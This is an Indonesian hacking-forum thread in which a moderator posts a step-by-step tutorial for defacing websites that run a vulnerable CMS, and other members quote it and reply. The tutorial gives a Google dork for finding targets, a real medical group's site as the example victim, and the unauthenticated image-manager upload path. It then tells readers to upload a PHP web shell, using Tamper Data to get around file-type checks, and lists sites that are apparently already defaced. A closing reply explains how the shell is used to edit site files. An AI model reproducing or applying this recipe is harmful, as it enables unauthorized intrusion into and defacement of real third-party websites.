Indonesian SWF Editor Community
 
HomeRegisterLog in
SELAMAT Datang Di Cmonhackns ===> Mulailah dari yang kecil... karena semua yang besar dulunya juga kecil..

Share | 
 

 Deface situs CMS dengan mudah

View previous topic View next topic Go down 
AuthorMessage
RieqyNS13
Moderator
Moderator


Jumlah posting : 379
Join date : 2011-01-16
Age : 19
Lokasi : chmod 0655 GetConfig.SQL

PostSubject: Deface situs CMS dengan mudah   Sun Feb 19, 2012 12:24 pm

dah lama nih ane gak ngeshare tutorial deface di sini..
ya udah,,langsung aja gan...

//yang harus diperhatiin dalam tutorial deface ini adalah DORK+SHELL..ga usah pengetahuan tentang sql2lan..kan ini cuma deface

1. Siapin dulu DORK yg ane maksud,,kaya gini gan :
Code:
inurl:"cms/article_view.php?id="

2. Copas dork tersebut di search engine google.com..jangan yg lain,, karena search engine yg lain tidak mendukung perintah2 kaya inurl:, intext, filetype: ..etc

3. Pilih salah satu situsnya....contoh :
Code:
http://amvimedicalgroup.com/cms/article_view.php?id=63

4. Trus hapus bagian cms/article_view.php?id=63 ,,dan ganti menjadi :
Code:
/cms/images/index.php?uplid=&uplact=headImg&u=&pathext=&permis1=&permis2=

Kaya gini :
Code:
http://amvimedicalgroup.com/cms/images/index.php?uplid=&uplact=headImg&u=&pathext=&permis1=&permis2=

5. Maka akan ada tampialn Image Manager
SS:
[You must be registered and logged in to see this image.]

>>http://amvimedicalgroup.com/cacad.html
>>http://vusuquocduong.com/
>>http://www.usaluat.com/maho.php

6. Dan selanjutnya tinggal upload Pilih Shell dan Upload trus ganti deh.,,klo saumpama Image Manager tidak menyetujui file yg berextensi .php, upload aja pke Tamper Data
NOTE : jangan di deface index nya, karena ini sbg pembelajaran doank gan pirat pirat sunny farao


_________________
403 Forbidden
Back to top Go down
http://rieqyns13.net
DreamStealer
Super Moderator
Super Moderator


Jumlah posting : 933
Join date : 2011-01-12
Age : 20
Lokasi : Antara ada dan tiada

PostSubject: Re: Deface situs CMS dengan mudah   Sun Feb 19, 2012 5:57 pm

emg boleh yah share beginian disini ? [You must be registered and logged in to see this image.]

_________________
Gunakanlah apa yg kau punya dengan sebaik2nya dan jangan pernah menggunakan hal itu untuk merugikan orang lain !
If You Want To Add Me on
Want to ask something? just send [You must be registered and logged in to see this image.]


[You must be registered and logged in to see this image.]
[You must be registered and logged in to see this image.]
Back to top Go down
DARK ANGEL OF CHEATER
Super Moderator
Super Moderator


Jumlah posting : 1248
Join date : 2011-04-12
Age : 18
Lokasi : Dihatimu

PostSubject: Re: Deface situs CMS dengan mudah   Tue Feb 21, 2012 3:39 pm

RieqyNS13 wrote:
dah lama nih ane gak ngeshare tutorial deface di sini..
ya udah,,langsung aja gan...

//yang harus diperhatiin dalam tutorial deface ini adalah DORK+SHELL..ga usah pengetahuan tentang sql2lan..kan ini cuma deface

1. Siapin dulu DORK yg ane maksud,,kaya gini gan :
Code:
inurl:"cms/article_view.php?id="

2. Copas dork tersebut di search engine google.com..jangan yg lain,, karena search engine yg lain tidak mendukung perintah2 kaya inurl:, intext, filetype: ..etc

3. Pilih salah satu situsnya....contoh :
Code:
http://amvimedicalgroup.com/cms/article_view.php?id=63

4. Trus hapus bagian cms/article_view.php?id=63 ,,dan ganti menjadi :
Code:
/cms/images/index.php?uplid=&uplact=headImg&u=&pathext=&permis1=&permis2=

Kaya gini :
Code:
http://amvimedicalgroup.com/cms/images/index.php?uplid=&uplact=headImg&u=&pathext=&permis1=&permis2=

5. Maka akan ada tampialn Image Manager
SS:
[You must be registered and logged in to see this image.]

>>http://amvimedicalgroup.com/cacad.html
>>http://vusuquocduong.com/
>>http://www.usaluat.com/maho.php

6. Dan selanjutnya tinggal upload Pilih Shell dan Upload trus ganti deh.,,klo saumpama Image Manager tidak menyetujui file yg berextensi .php, upload aja pke Tamper Data
NOTE : jangan di deface index nya, karena ini sbg pembelajaran doank gan pirat pirat sunny farao


hmm aku g mudeng tp aku ingin nyoba jg tuh shell artinya apa dan cara buatnya gimana

_________________
_________________
TOLONG BACA FORUM RULES SEBELUM KALIAN MEMBUAT POST UNTUK MENGHINDARI PELANGGARAN RULES DI FORUM CMONHACKNS                                                                                                                                                                            TERIMAKASIH BAGI ANDA YANG SUDAH MEMATUHI RULES DI FORUM INI
Back to top Go down
http://www.facebook.com/www.cmonhackns.net
RieqyNS13
Moderator
Moderator


Jumlah posting : 379
Join date : 2011-01-16
Age : 19
Lokasi : chmod 0655 GetConfig.SQL

PostSubject: Re: Deface situs CMS dengan mudah   Tue Feb 21, 2012 4:51 pm

DARK ANGEL OF CHEATER wrote:
RieqyNS13 wrote:
dah lama nih ane gak ngeshare tutorial deface di sini..
ya udah,,langsung aja gan...

//yang harus diperhatiin dalam tutorial deface ini adalah DORK+SHELL..ga usah pengetahuan tentang sql2lan..kan ini cuma deface

1. Siapin dulu DORK yg ane maksud,,kaya gini gan :
Code:
inurl:"cms/article_view.php?id="

2. Copas dork tersebut di search engine google.com..jangan yg lain,, karena search engine yg lain tidak mendukung perintah2 kaya inurl:, intext, filetype: ..etc

3. Pilih salah satu situsnya....contoh :
Code:
http://amvimedicalgroup.com/cms/article_view.php?id=63

4. Trus hapus bagian cms/article_view.php?id=63 ,,dan ganti menjadi :
Code:
/cms/images/index.php?uplid=&uplact=headImg&u=&pathext=&permis1=&permis2=

Kaya gini :
Code:
http://amvimedicalgroup.com/cms/images/index.php?uplid=&uplact=headImg&u=&pathext=&permis1=&permis2=

5. Maka akan ada tampialn Image Manager
SS:
[You must be registered and logged in to see this image.]

>>http://amvimedicalgroup.com/cacad.html
>>http://vusuquocduong.com/
>>http://www.usaluat.com/maho.php

6. Dan selanjutnya tinggal upload Pilih Shell dan Upload trus ganti deh.,,klo saumpama Image Manager tidak menyetujui file yg berextensi .php, upload aja pke Tamper Data
NOTE : jangan di deface index nya, karena ini sbg pembelajaran doank gan pirat pirat sunny farao


hmm aku g mudeng tp aku ingin nyoba jg tuh shell artinya apa dan cara buatnya gimana

Shell itu semacam kumpulan code php yg berfungsi untuk mengexploitasi isi website, shell itu berperan penting dalam deface halaman secara kseluruhan dan ngotak-ngatik script website...
klo cuma masuk menu admin aja mungkin gak bisa deface index nya, karena sebagian besar panel admin pada website gak ada menu untuk ganti index nya, pling cuma menu untuk nambah artikel, kategori, ganti judul, fax, etc...
untuk karena itu kita upload shell dulu di bagian menu upload..klo udah di upload, tinggal kita buka shell tdi, dan script2 di dalam website kaya mysql, php bisa di modifikasi
hampir sama kaya Windows Explore

_________________
403 Forbidden
Back to top Go down
http://rieqyns13.net
Sponsored content




PostSubject: Re: Deface situs CMS dengan mudah   Today at 9:23 am

Back to top Go down
 
Deface situs CMS dengan mudah
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
-
» Mohon tunjuk ajar dan cadangan dari para sahabat...
» Nak Upgrade
» SYM VTS Special Edition
» Menunggu\menabung dengan penuh kesabaran- BMW
» untuk peminat burger!!

Permissions in this forum:You cannot reply to topics in this forum
cmonhackns.n-stars.org :: Off Topic :: Chit - Chat-
Jump to: